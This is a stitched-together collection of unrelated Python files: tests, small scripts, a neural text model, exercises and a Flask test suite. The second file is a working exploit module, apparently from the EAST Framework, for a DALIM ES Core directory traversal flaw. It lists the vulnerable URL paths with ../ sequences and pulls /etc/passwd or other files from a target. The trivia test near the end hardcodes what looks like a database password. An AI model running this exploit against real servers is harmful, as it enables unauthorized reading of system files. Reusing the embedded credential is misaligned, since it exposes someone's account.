assert len(elements) == 4 + 1 + 2
box_p1 = _get_box(elements, table.get(1))
box_p2 = _get_box(elements, table.get(2))
box_p3 = _get_box(elements, table.get(3))
box_p4 = _get_box(elements, table.get(4))
assert box_p1.xmin < box_p2.xmin
assert box_p1.ymin == box_p2.ymin
assert box_p3.xmin < box_p4.xmin
assert box_p3.ymin == box_p4.ymin
def test_couple_no_parent_info(self):
table = Table([
Person(1, "husband", "M", spouse_id=2),
Person(2, "wife", "F", spouse_id=1),
])
layout_func = ButterflyLayout()
elements = layout_func(table, table.get(1))
assert len(elements) == 2 + 1
box_p1 = _get_box(elements, table.get(1))
box_p2 = _get_box(elements, table.get(2))
assert box_p1.xmin < box_p2.xmin
assert box_p1.ymin == box_p2.ymin
def test_couple_partial_parent_info(self):
table = Table([
Person(1, "father1", "M", spouse_id=2),
Person(2, "mother1", "F", spouse_id=1),
Person(3, "brother1", "M", father_id=1, mother_id=2, birth_order=1),
Person(4, "brother2", "M", father_id=1, mother_id=2, birth_order=3),
Person(5, "husband", "M", spouse_id=6, father_id=1, mother_id=2, birth_order=2),
Person(6, "wife", "F", spouse_id=5),
])
layout_func = ButterflyLayout()
elements = layout_func(table, table.get(5))
assert len(elements) == 6 + 2 + 3
box_p1 = _get_box(elements, table.get(1))
box_p2 = _get_box(elements, table.get(2))
box_p3 = _get_box(elements, table.get(3))
box_p4 = _get_box(elements, table.get(4))
box_p5 = _get_box(elements, table.get(5))
box_p6 = _get_box(elements, table.get(6))
assert box_p1.xmin < box_p2.xmin
assert box_p1.ymin == box_p2.ymin
assert box_p3.xmin < box_p4.xmin < box_p5.xmin < box_p6.xmin
assert box_p3.ymin == box_p4.ymin == box_p5.ymin == box_p6.ymin
|
#! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
import sys
import os
import urllib2
from collections import OrderedDict
sys.path.append('./core')
from Sploit import Sploit
INFO = {}
INFO['NAME'] = "efa_dalim_software_es_core_fd"
INFO['DESCRIPTION'] = "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal"
INFO['VENDOR'] = "https://www.dalim.com"
INFO['DOWNLOAD_LINK'] = ''
INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42438/']
INFO["CVE Name"] = "?"
INFO["NOTES"] = """Affected version: ES/ESPRiT 5.0 (build 7184.1)
(build 7163.2)
(build 7163.0)
(build 7135.0)
(build 7114.1)
(build 7114.0)
(build 7093.1)
(build 7093.0)
(build 7072.0)
(build 7051.3)
(build 7051.1)
(build 7030.0)
(build 7009.0)
(build 6347.0)
(build 6326.0)
(build 6305.1)
(build 6235.9)
(build 6172.1)
ES/ESPRiT 4.5 (build 6326.0)
(build 6144.2)
(build 5180.2)
(build 5096.0)
(build 4314.3)
(build 4314.0)
(build 4146.4)
(build 3308.3)
ES/ESPRiT 4.0 (build 4202.0)
(build 4132.1)
(build 2235.0)
ES/ESPRiT 3.0
Input passed thru several parameters is not properly verified before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files from local resources with directory traversal attacks.
"""
INFO['CHANGELOG'] = "14 Aug 2017. Written by Gleg team."
INFO['PATH'] = 'Exploits/General/'
# Must be in every module, to be set by framework
OPTIONS = OrderedDict()
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
OPTIONS["PORT"] = 80, dict(description = 'Target port')
OPTIONS['PATH'] = 'etc/passwd', dict(description = 'Path to downloaded file at target machine')
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.host = host
self.port = port
self.path = OPTIONS['PATH']
self.urls = None
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.path = self.args.get('PATH', OPTIONS['PATH'])
self.urls = ['Esprit/public/Password.jsp?orgName=../../../../../../../../../',
'Esprit/ES/Login?orgUnitName=../../../../../../../../../',
'dalimws/log?len=10000&download=true&file=../../../../../../../']
def make_url(self, path = ''):
return 'http://{}:{}/{}'.format(self.host, self.port, path)
def run(self):
self.args()
self.log("Attacking {}".format(self.host))
content = ''
for url in self.urls:
curl = self.make_url(url + self.path)
self.log('Try to download file ' + self.path)
try:
fd = urllib2.urlopen(curl)
content = fd.read()
if content:
self.log('= File Content =')
self.log(content)
self.log('= End of File =')
self.writefile(content)
self.finish(True)
break
except Exception as e:
self.log(e)
self.finish(False)
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit('', 80)
e.run()
|
# USAGE
# python ~/ML/cats-vs-dogs/caffe/code/check_dpu_runtime_accuracy.py -i ~/ML/cats-vs-dogs/deephi//quantiz/zcu102/rpt/logfile_top2_alexnetBNnoLRN.txt
# It checks the top-1 and top-2 accuracy obtained at runtime by DeePhi DPU, by analysis of the related logfile
# by daniele.bagni@xilinx.com
# ##################################################################################################
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
warnings.filterwarnings("ignore", message="numpy.ufunc size changed")
import numpy as np
from datetime import datetime
import os
import sys
import argparse
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--file", required=True, help="input logfile")
ap.add_argument("-n", "--numel", default="1000", help="number of test images")
args = vars(ap.parse_args())
logfile = args["file"] # root path name of dataset
try:
f = open(logfile, "r")
except IOError:
print 'cannot open ', logfile
else:
lines = f.readlines()
tot_lines = len(lines)
print logfile, ' has ', tot_lines, ' lines'
#f.seek(0)
f.close()
# ##################################################################################################
NUMEL = int(args["numel"]) #1000
# initialize the label names for the CATS-vs-DOGS dataset
labelNames = {"cat" : 0, "dog" : 1 }
# ##################################################################################################
top1_true = 0
top1_false = 0
img_count = 0
false_pred = 0
test_ids = np.zeros(([NUMEL,1]))
preds = np.zeros(([NUMEL, 1]))
idx = 0
for ln in range(0, tot_lines):
if "DBG" in lines[ln]:
top2_lines = lines[ln:ln+3]
filename= top2_lines[0].split("images/")[1]
s2 = filename.index(".")
class_name = filename[: s2].strip()
#print 'DBG: found class ', class_name, ' in line ', ln, ': ', lines[ln]
predicted = top2_lines[1].split("name = ")[1].strip()
if class_name in top2_lines[1]:
top1_true += 1
elif class_name in top2_lines[2]:
top1_false +=1
else:
print "ERROR: no class detected\n"
sys.exit(0)
test_ids[idx] = labelNames[class_name] # ground truth
preds[idx] = labelNames[predicted ] # actual prediction
if (predicted != class_name) :
print "LINE: ", top2_lines[0].split("./")[1].strip()
print "PREDICTED: ", preds[idx], predicted
print "EXPECTED : ", test_ids[idx], class_name
for k in range(1, 3):
print top2_lines[k].strip()
print "\n"
img_count +=1
idx += 1
if ( idx == (NUMEL-1) ):
break
else:
continue
assert (top1_true+top1_false) == img_count, "ERROR: top1 true+false not equal to the number of images"
print 'number of total images predicted ', img_count
print 'number of top1 false predictions ', top1_false
print 'number of top1 right predictions ', top1_true
top1_accuracy = float(top1_true)/(top1_true+top1_false)
print('top1 accuracy = %.2f' % top1_accuracy)
|
def nian_qw(year):
if year%400 == 0 or (year%4 == 0 and year%100 != 0):
print("闰年")
else:
print("平年")
year = int(input("请输入你要查看的年份:"))
nian_qw(year)
|
def countryList():
colist = ['Angola',
'Benin',
'Botswana',
'Burkina Faso',
'Burundi',
'Cameroon',
#'Cape Verde', #cabo verde
'Central African Republic',
'Chad',
'Comoros',
#'Congo (Brazzaville)',
#'Congo (Democratic Republic)', #parens? #congo, rep.
#"CC4te d'Ivoire",
'Djibouti',
'Equatorial Guinea',
'Eritrea',
'Ethiopia',
'Gabon',
#'The Gambia', #gambia, the
'Ghana',
'Guinea',
'Guinea-Bissau',
'Kenya',
'Lesotho',
'Liberia',
'Madagascar',
'Malawi',
'Mali',
'Mauritania',
'Mauritius',
'Mozambique',
'Namibia',
'Niger',
'Nigeria',
##'RC)union',
'Rwanda',
'Sao Tome and Principe',
'Senegal',
'Seychelles',
'Sierra Leone',
'Somalia',
'South Africa',
'Sudan',
'Swaziland',
'Tanzania',
'Togo',
'Uganda',
#'Western Sahara',
'Zambia',
'Zimbabwe']
return colist
def comparisonList():
colist = ['Sweden', 'United Kingdom', 'Belgium', 'Ethiopia', 'Uganda', 'Zimbabwe']
return colist
if __name__=="__main__":
print countryList()
print comparisonList()
|
class Solution:
def hasAllCodes(self, s: str, k: int) -> bool:
need = 1<<k
mySet = set()
for i in range(k, len(s)+1):
now = s[i-k:i]
if now not in mySet:
mySet.add(now)
need -= 1
if need == 0:
return True
return False |
from django.contrib import admin
from sms_app.models.models import *
admin.site.register(Address)
admin.site.register(Employee)
admin.site.register(Post)
admin.site.register(Sanatorium)
admin.site.register(RoomPlacesType)
admin.site.register(RoomType)
admin.site.register(Room)
admin.site.register(TreatmentCourse)
admin.site.register(CustomerInfo)
admin.site.register(Booking)
admin.site.register(Customer)
|
from service.config.service_config import ServiceConfig
from service.db.db_base import DBBase
from service.providers.channel_provider import ChannelProvider
from service.services.chat_service_base import ChatServiceBase
from service.services.web_service_base import WebServiceBase
class ServiceDependencies(object):
config: ServiceConfig
db: DBBase
web_service: WebServiceBase
chat_service: ChatServiceBase
channel_provider: ChannelProvider
|
# Decorators 2 - Name Directory
#######################################################################################################################
#
# Let's use decorators to build a name directory! You are given some information about N people. Each person has
# a first name, last name, age and sex. Print their names in a specific format sorted by their age in ascending
# order i.e. the youngest person's name should be printed first. For two people of the same age,
# print them in the order of their input.
#
# For Henry Davids, the output should be:
# Mr. Henry Davids
#
# For Mary George, the output should be:
# Ms. Mary George
#
# Input Format
# The first line contains the integer N, the number of people.
# N lines follow each containing the space separated values of the first name, last name, age and sex, respectively.
#
# Constraints
# 1 <= N <= 10
#
# Output Format
# Output N names on separate lines in the format described above in ascending order of age.
#
# Sample Input
# 3
# Mike Thomson 20 M
# Robert Bustle 32 M
# Andria Bustle 30 F
#
# Sample Output
# Mr. Mike Thomson
# Ms. Andria Bustle
# Mr. Robert Bustle
#
# Concept
# For sorting a nested list based on some parameter, you can use the itemgetter library.
# You can read more about it here.
# (http://stackoverflow.com/questions/409370/sorting-and-grouping-nested-lists-in-python?answertab=votes)
#
#######################################################################################################################
|
# coding: utf-8
import boto3
session = boto3.Session(profile_name='Ian-pfb')
as_client = session.client('autoscaling')
as_client.execute_policy(
AutoScalingGroupName='Notifon Example Group', PolicyName='Scale Up')
|
from hmmlearn.hmm import MultinomialHMM
def fit(seqs, n_components=1):
MultinomialHMM(
n_components=n_components,
startprob_prior=1.0,
transmat_prior=1.0,
algorithm='viterbi',
random_state=1,
n_iter=100,
tol=0.01,
verbose=True,
params='ste',
init_params='ste'
)
|
# COLLE Maxime
# DOUCHET Benjamin
# TP5
#ex1
print('','\n','\n','\n','\n')
#ex2
def imprimer_vertical(s) :
"""
imprime la chaine de caractère en verticale
à la verticale
param s (str)
C,U none
>>> imprimer_vertical ('Test')
T
e
s
t
"""
for c in s:
print(c)
#ex3
def my_len(a) :
"""
renvoie la longueur de la variable
a variable (str)
C.U none
>>> my_len('test')
4
>>> my_len('123456789')
9
"""
b=0
for c in a:
b = b+1
return b
#ex4
#Q1
def tirets(a) :
"""
renvoie la chaine en entrée en inserant un tiret entre chaques caractères
a variable (str)
C.U none
>>> tirets('hello there')
'h-e-l-l-o- -t-h-e-r-e-'
>>> tirets('bonjour')
'b-o-n-j-o-u-r-'
"""
temp= ''
for c in a :
temp= temp+(c+'-')
return temp
#Q2
def tirets_v2(a) :
"""
renvoie la chaine en entrée en inserant un tiret entre chaques caractères en sautant les espaces
a variable (str)
C.U none
>>> tirets_v2('hello there')
'h-e-l-l-o- t-h-e-r-e-'
"""
temp = ''
for c in a :
if c == ' ':
temp = temp + c
else :
temp = temp+(c+'-')
return temp
#Ex 5
def miroir(a):
"""
revoie la chaine en entrée dans l'ordre inverse
a (str) mots à inverser
C.U none
>>> miroir('colle')
'elloc'
>>> miroir('kayak')
'kayak'
"""
temp = ''
for c in a :
temp = c + temp
return temp
#Ex 6
#Q1
def est_palindromique(a) :
"""
prédicat nous retournant si la chaine de caractère est palindromique ou non
a (str)
C.U none
>>> est_palindromique('kayak')
True
>>> est_palindromique('kaya')
False
"""
temp = ''
for c in a :
temp = c + temp
return a == temp
#Q2
def est_palindromique_v2(a):
"""
prédicat nous retournant si la chaine de caractère est palindromique ou non
a (str)
C.U none
>>> est_palindromique('kayak')
True
>>> est_palindromique('kaya')
False
"""
b = miroir(a)
return b == a
#Ex 7
#Q1
def supprimerOccCarac(a , b):
"""
fonction suprimmant les occurence de caracatères en b de la chaine a
a (str) la chaine à étudier
b (str) le caractère à suprimer
C.U none
>>> supprimerOccCarac('timoleon' , 'o')
'timlen'
"""
temp= ''
for c in a :
if c == b :
temp = temp
else :
temp = temp + c
return temp
#Q2
est_palindromique_v2(supprimerOccCarac('esope reste ici et se repose' , ' '))
#Ex8
def mettreEnMajuscule(a) :
"""
modifie la casse de la chaine pour la mettre en majuscule
a ( str ) chaine à mettre en majuscule
C.U none
>>> mettreEnMajuscule('polom étro')
'POLOM éTRO'
"""
temp =''
for c in a :
if ord(c) >= ord('a') and ord(c) <= ord('z') :
c = chr(ord(c)-(ord('a')-ord('A')))
temp = temp + c
else :
temp = temp + c
return temp
#ex 9
def mettreEnMinuscule(a) :
"""
modifie la casse de la chaine pour la mettre en minuscule
a ( str ) chaine à mettre en minuscule
C.U none
>>> mettreEnMinuscule('POLOM éTRO')
'polom étro'
>>> mettreEnMinuscule('aBC\u00c9,3 @!-XYz')
'abcÉ,3 @!-xyz'
"""
temp =''
for c in a :
if ord(c) >= ord('A') and ord(c) <= ord('Z'):
c = chr(ord(c)+(ord('a')-ord('A')))
temp = temp + c
else :
temp = temp + c
return temp
#ex 10
def transformerMinMaj(a) :
"""
modifie la casse des minuscule en majuscule et vice-versa
a (str) la chaine à transformfer
C.U none
>>> transformerMinMaj('Pollo MéTRo')
'pOLLO métrO'
>>> transformerMinMaj('aBC\u00c9,3 @!-XYz')
'AbcÉ,3 @!-xyZ'
"""
temp =''
for c in a :
if ord(c) >= ord('A') and ord(c) <= ord('Z'):
c = chr(ord(c)+(ord('a')-ord('A')))
temp = temp + c
elif ord(c) >= ord('a') and ord(c) <= ord('z') :
c = chr(ord(c)-(ord('a')-ord('A')))
temp = temp + c
else :
temp = temp + c
return temp
#ex 11
def comparerChaines( a , b ) :
"""
compare les str en entrée et renvoie 0 si egales 1 si a>b et 2 si b<a
a ( str ) chaine en entrée 1
b ( str ) chaine en entrée 2
>>> comparerChaines('texte' , 'texte')
0
>>> comparerChaines('texto' , 'texte')
1
>>> comparerChaines('texte' , 'texto')
2
>>> comparerChaines('teeeeeeexte' , 'texto')
2
"""
if a < b :
res=2
elif b<a :
res = 1
else :
res = 0
return res
#ex12
#Q1
def rechercherCaractereG(a,b):
"""
donne l'indice de la première occurence de b dans a en partant de la gauche
renvoie -1 si la lettre a chercher n'apparait pas
a ( str ) chaine de caractere à analyser
b ( str ) le caractère à rechercher
>>> rechercherCaractereG('voici une chaîne', 'i')
2
>>> rechercherCaractereG('voici une chaîne', 'x')
-1
"""
temp = -1
trouve = False
for i in range(len(a)) :
if a[i]== b and not trouve :
temp = i
trouve = True
return temp
#Q2
def rechercherCaractereD(a,b):
"""
donne l'indice de la première occurence de b dans a en partant de la droite
renvoie -1 si la lettre a chercher n'apparait pas
a ( str ) chaine de caractere à analyser
b ( str ) le caractère à rechercher
>>> rechercherCaractereD('voici une chaîne', 'i')
4
>>> rechercherCaractereD('voici une chaîne', 'x')
-1
"""
temp = -1
trouve = False
for i in range(len(a)-1,-1,-1):
if a[i]== b and not trouve :
temp = i
trouve = True
return temp
#Q3
def rechercherCaractereG_V2(a,b):
"""
donne l'indice de la première occurence de b dans a en partant de la gauche
renvoie -1 si la lettre a chercher n'apparait pas
a ( str ) chaine de caractere à analyser
b ( str ) le caractère à rechercher
>>> rechercherCaractereG('voici une chaîne', 'i')
2
>>> rechercherCaractereG('voici une chaîne', 'x')
-1
"""
temp = -1
trouve = False
a1=miroir(a)
rechercherCaractereD(a1,b)
#ex13
def nbreOccurences(a,b):
"""
compte le nombre d'occurence dans a de b
a ( str ) chaine de caractere à analyser
b ( str ) le caractère à rechercher
"""
temp = 0
for c in a :
if c == b :
temp = temp+1
return temp
# ex14
#Q1
def plusFrequent(a):
"""
renvoie le caractere le plus fréquent de la str
a (str) en minuscule
cu none
>>> plusFrequent('esope reste ici et se repose')
'e'
>>> plusFrequent("Il y a autant de 'e' que de 'a' dans cette phrase, pas plus")
'a'
>>> plusFrequent('')
''
"""
maxocc = 0
pf =""
alphabet = "abcdefghijklmnopqrstuvwxyz"
for c in alphabet :
nbocc = 0
for cs in a :
if cs == c :
nbocc += 1
if nbocc > maxocc :
maxocc = nbocc
pf = c
return pf
#Q2
def plusFrequent_V2(a):
"""
renvoie le caractere le plus fréquent de la str
a (str) en minuscule
cu none
>>> plusFrequent_V2('esope reste ici et se repose')
'e'
>>> plusFrequent_V2("Il y a autant de 'e' que de 'a' dans cette phrase, pas plus")
'a'
>>> plusFrequent_V2('')
''
"""
maxocc = 0
pf =""
alphabet = "abcdefghijklmnopqrstuvwxyz"
for c in alphabet :
nbocc = nbreOccurences(a,c)
if nbocc > maxocc :
maxocc = nbocc
pf = c
return pf
#Ex15
#Q1
def supprimerCarac(s,b):
"""
fonction supprime le caractère d'indice b dans la chaine s
s (str) chaine à traiter
b ( int ) positif indice de l'occurence à supprimer
C.U none
>>> supprimerCarac('Timoleon', 3)
'Timleon'
>>> supprimerCarac('Timoleon', -2)
'Timoleon'
>>> supprimerCarac('Timoleon', 10)
'Timoleon'
"""
temp =""
for i in range(len(s)):
if i == b :
temp = temp
else :
temp = temp + s[i]
return temp
#Q2
def supprimerCarac_v2(s,b):
"""
fonction supprime le caractère d'indice b dans la chaine s
s (str) chaine à traiter
b ( int ) indice de l'occurence à supprimer
C.U none
>>> supprimerCarac_v2('Timoleon', 3)
'Timleon'
>>> supprimerCarac_v2('Timoleon', -1)
'Timoleo'
>>> supprimerCarac_v2('Timoleon', 10)
'Timoleon'
>>> supprimerCarac_v2('Timoleon', -8)
'imoleon'
"""
temp =""
if b >= 0 :
for i in range(len(s)):
if i == b :
temp = temp
else :
temp = temp + s[i]
else :
for i in range(len(s)-1, -1 , -1) :
if i == (len(s)+b) :
temp = temp
else :
temp =s[i] + temp
return temp
#Ex 16
def insererCaractere ( a , b , c ):
"""
insère le caratere en var(c)) à l'indice var(b) dans la chaine var(a
a ( str ) chaine à modifier
b (int) indice où inserer
c ( str) chaine à inserer
C.U b entier positif
>>> insererCaractere('Timleon', 3, 'o')
'Timoleon'
>>> insererCaractere('Aucune modification', 20, '!')
'Aucune modification'
"""
temp = ""
for i in range(len(a)) :
if i == b :
temp = temp + c + a[i]
else :
temp = temp + a[i]
return temp
#ex 17
#Q1
def remplacerCaractere ( a , b , c ):
"""
renvoie la chaine en var(a) en remplaçant le caratère de l'indice
désigné par b par la le caractère en c
a(str) chaine à modifier
b (int) positif indice de la lettre à modifier
c (str) caractère de remplacement
>>> remplacerCaractere('Tim-leon', 3, 'o')
'Timoleon'
>>> remplacerCaractere('Ti-on', 2, 'mole')
'Timoleon'
>>> remplacerCaractere('Aucune modification', 20, ' réalisée')
'Aucune modification'
"""
temp = ""
for i in range( len(a)) :
if i == b :
temp = temp + c
else :
temp = temp + a[i]
return temp
#Q2
def remplacerOccurrences(a ,b ,c ):
"""
renvoie la chaine en var(a) en remplaçant les occurences du caratère de
b par la chaine en c
a(str) chaine à modifier
b (int) positif indice de la lettre à modifier
c (str) caractère de remplacement
>>> remplacerOccurrences('@ 3 est le neveu de @ 1er.','@','Napoléon')
'Napoléon 3 est le neveu de Napoléon 1er.'
"""
temp = ""
for i in range( len(a)) :
if a[i] == b :
temp = temp + c
else :
temp = temp + a[i]
return temp
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS, verbose = True) |
number1 = 3 #number given to the variable
number2 = 4 # Integer
float_ = 2.35 #Float, has decimals
boolean = True # It can have two outcomes - true or false.
character = "%"
string = "qwer" #String can be anything within the quatanion marks
sudetis = number1 + number2
rounded1float = round(float_, 1) # The round function to round decimal number to specific number.
print(2**3) # Rise 2 to the power of 3
dalyba_su_liekana = 1654813 % 15427 # Print the raimainder of the divided number.
print(dalyba_su_liekana)
print(len(string)) #Prints the number of symblos in the string
|
import torch
import math
import numpy as np
from torch import nn
from torch.nn import functional as F
from typing import Union
from vq_vae_text.modules import Quantize, GeometricCategoricalDropout, CategoricalNoise, SlicedQuantize, ChannelWiseLayerNorm, wn_conv_transpose1d, wn_conv1d, wn_linear, Attention
from vq_vae_text.models.transformer import PositionalEncoding
class ResBlock(nn.Module):
def __init__(self, in_channel, channel, kernel_size=3, padding=1, dilation=1):
super().__init__()
self.conv = nn.Sequential(
nn.ELU(),
nn.Conv1d(in_channel, channel, kernel_size=kernel_size, padding=padding + 2, dilation=3),
nn.ELU(),
nn.Conv1d(channel, in_channel, kernel_size=kernel_size, padding=padding),
)
def forward(self, input):
return self.conv(input) + input
class Encoder(nn.Module):
def __init__(self, in_channel, channel, res_channel, n_res_blocks=2):
super().__init__()
self.first = nn.Conv1d(in_channel, channel, kernel_size=4, stride=2, padding=1)
blocks = []
for i in range(n_res_blocks):
blocks.append(ResBlock(channel, res_channel))
self.blocks = nn.Sequential(*blocks)
self.attention = Attention(channel, channel // 4, channel, n_heads=1)
def forward(self, input):
out = keys = self.first(input)
out = self.blocks(out)
out = out + self.attention(out, out)
return out
class Decoder(nn.Module):
def __init__(self, channel, out_channel, res_channel, n_res_blocks=2):
super().__init__()
blocks = []
for i in range(n_res_blocks):
blocks.append(ResBlock(channel, res_channel))
self.blocks = nn.Sequential(*blocks)
self.attention = Attention(channel, channel // 4, channel, n_heads=1)
self.final = nn.ConvTranspose1d(channel, out_channel, kernel_size=4, stride=2, padding=1)
self.blocks = nn.Sequential(*blocks)
def forward(self, input):
out = self.blocks(input)
out = out + self.attention(out, out)
out = self.final(out)
return out
class TextCNNV2(nn.Module):
def __init__(self,
vocab_size: int,
channel: int,
res_channel: int,
n_res_blocks: int,
n_encoders: int,
tau: float,
pad_idx: Union[None, int],
input_noise=0.0,
embed_dropout=0.0,
num_vq_embeds: int = 512,
vq_embeds_dim: int = None,
vq_loss_alpha=0.25,
vq_decay=0.99,
ignore_quant=False):
super().__init__()
self.vocab_size = vocab_size
self.pad_idx = pad_idx
self.tau = tau
self.vq_loss_alpha = vq_loss_alpha
self.ignore_quant = ignore_quant
self.vq_loss = 0
self.nll_loss = 0
self.acc = 0
self.vq_blend = 0.0
self.blend_steps = 5000
self.blend_step = 0
self.vq_embeds_dim = vq_embeds_dim
self.input_noise = CategoricalNoise(vocab_size, input_noise)
self.embed_dropout = nn.Dropout(embed_dropout)
self.embed = nn.Embedding(vocab_size, channel, padding_idx=pad_idx, max_norm=1.0)
self.encoder = nn.Sequential(*[Encoder(channel, channel, res_channel, n_res_blocks)
for i in range(n_encoders)])
self.decoder = nn.Sequential(*[Decoder(channel, channel, res_channel, n_res_blocks)
for i in range(n_encoders)[::-1]])
self.conv_to_quant = nn.Conv1d(channel, vq_embeds_dim, kernel_size=1)
self.quant_to_conv = nn.Conv1d(vq_embeds_dim, channel, kernel_size=1)
self.quantize = Quantize(dim=vq_embeds_dim, n_embed=num_vq_embeds, decay=vq_decay)
self.conv_to_logits = nn.Conv1d(channel, vocab_size, kernel_size=1)
self.nll = nn.NLLLoss(reduction='none', ignore_index=self.pad_idx)
def get_quantization_layers(self):
return [self.quantize]
def encode(self, input):
out = self.embed(input)
out = out.permute(0, 2, 1)
out = self.encoder(out)
out = self.conv_to_quant(out).permute(0, 2, 1)
quant, diff, code = self.quantize(out)
quant = quant.permute(0, 2, 1)
return [quant], diff, [code]
def decode(self, quants):
quant = quants[0]
quant = self.quant_to_conv(quant)
out = self.decoder(quant)
logits = self.conv_to_logits(out)
logits = logits.permute(0, 2, 1)
logits = logits / self.tau
logp_probs = F.log_softmax(logits, dim=-1)
return logp_probs
def decode_code(self, codes):
code = codes[0]
quant = self.quantize.embed_code(code)
quant = quant.permute(0, 2, 1)
x = self.decode([quant])
return x
def forward(self, x):
z, diff, ids = self.encode(x)
logp = self.decode(z)
self.blend_step += 1
return logp, z, diff, ids
def compute_accuracy(self, recon_probs, target, mask=None):
if mask is None:
mask = torch.ones_like(target)
lens = mask.sum(-1).float()
corr = ((recon_probs.argmax(-1) == target) * mask).sum(-1) / lens
acc = corr.double().mean().item()
return acc
def loss_function(self, inputs, target):
logp, z, diff, ids = inputs
if self.pad_idx is not None:
mask = target != self.pad_idx
else:
mask = torch.ones_like(target)
lens = mask.sum(-1).float()
acc = self.compute_accuracy(logp, target, mask=mask)
bs = logp.size(0)
logp = logp.view(-1, logp.size(-1))
target = target.reshape(-1)
nll_loss = self.nll(logp, target).view(bs, -1) * mask
nll_loss = (nll_loss.sum(-1) / lens).mean()
self.vq_loss = diff
self.nll_loss = nll_loss
self.acc = acc
return self.nll_loss + self.vq_loss_alpha * self.vq_loss
def latest_losses(self):
return {
'nll': self.nll_loss,
'ppl': math.exp(self.nll_loss),
'bpc': self.nll_loss / math.log(2),
'vq': self.vq_loss,
'acc': self.acc,
}
|
import os
import unittest
import json
from flask_sqlalchemy import SQLAlchemy
from models import setup_db, Question, Category
from flaskr import create_app
class TriviaTestCase(unittest.TestCase):
"""This class represents the trivia test case"""
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app()
self.client = self.app.test_client
# db_config = self.app.config["DATABASE_SETUP"]
self.app.config["SQLALCHEMY_DATABASE_URI"] = "postgres://{}:{}@{}/{}"\
.format("AshNelson",
"ologinahtti1",
"localhost:5432",
"trivia_test")
setup_db(self.app)
self.new_question = {
"category" : 6,
"question" : "Who is the greatest developer? Hint: the author "
"of this question",
"answer" : "Joao Albuquerque",
"difficulty": 1
}
# binds the app to the current context
with self.app.app_context():
self.db = SQLAlchemy()
self.db.init_app(self.app)
# create all tables
self.db.create_all()
def tearDown(self):
"""Executed after reach test"""
pass
# Done: Write at least one test for each test for successful operation
# and for expected errors. GET Categories
def test_retrieve_categories(self):
res = self.client().get('/api/categories')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['categories'], True)
# GET Questions - Paginated
def test_retrieve_questions_paginated(self):
res = self.client().get('/api/questions')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
# GET Questions - Paginated - Out of bounds
def test_retrieve_questions_out_of_pagination(self):
res = self.client().get('/api/questions?page=1000')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertTrue(data['message'])
# GET Questions by Category
def test_retrieve_questions_by_category_paginated(self):
res = self.client().get('/api/categories/6/questions')
data = json.loads(res.data)
total_questions = len(Question.query.filter(Question.category == 6)
.all())
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertEqual(data['total_questions'], total_questions)
# GET Questions by Category - out of bounds
def test_retrieve_questions_by_category_out_of_pagination(self):
res = self.client().get('/api/categories/6/questions?page=1000')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertTrue(data['message'])
# POST Create a Questions
def test_create_questions(self):
res = self.client().post('/api/questions', json=self.new_question)
data = json.loads(res.data)
question = Question.query.order_by(Question.id).all()
total_questions = len(question)
print("Total questions: ", total_questions)
added_question = question[total_questions-1]
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertEqual(data['created'], added_question.id)
self.assertEqual(data['message'], "Question created")
# Clean up
added_question.delete()
# POST Failed to Create a Questions
def test_create_questions_not_enough_information(self):
res = self.client().post('/api/questions', json={})
data = json.loads(res.data)
self.assertEqual(res.status_code, 422)
self.assertEqual(data['success'], False)
self.assertTrue(data['message'])
# POST Failed to Create a Questions wrong Endpoint
def test_create_questions_wrong_endpoint(self):
res = self.client().post('/api/questions/12', json={})
data = json.loads(res.data)
self.assertEqual(res.status_code, 405)
self.assertEqual(data['success'], False)
self.assertTrue(data['message'])
# DELETE a Question - no id specified
def test_delete_question_by_id_no_id_specified(self):
res = self.client().delete('/api/questions/')
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertTrue(data['message'])
# DELETE a Question - invalid id specified
def test_delete_question_by_id_no_question_found(self):
res = self.client().delete('/api/questions/1')
data = json.loads(res.data)
self.assertEqual(res.status_code, 422)
self.assertEqual(data['success'], False)
self.assertTrue(data['message'])
# DELETE a Question - successfully
def test_delete_question_by_id(self):
# add a question and use that id to delete
added_question = Question(
question="This is a question?",
category=3,
difficulty=3,
answer="This is an answer"
)
added_question.insert()
res = self.client().delete('/api/questions/{}'.
format(added_question.id))
data = json.loads(res.data)
total_questions = len(Question.query.all())
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertEqual(data['message'], "Deleted")
# POST Search Questions - with results
def test_search_questions_with_results(self):
res = self.client().post('/api/questions/search',
json={"search_term": "title"})
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(data['questions'])
self.assertGreater(data['total_questions'], 0)
# POST Search Questions - no results
def test_search_questions_without_results(self):
res = self.client().post('/api/questions/search',
json={"search_term": "zebra"})
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertFalse(data['questions'])
self.assertEqual(data['total_questions'], 0)
# POST Search Questions - blank searchTerm
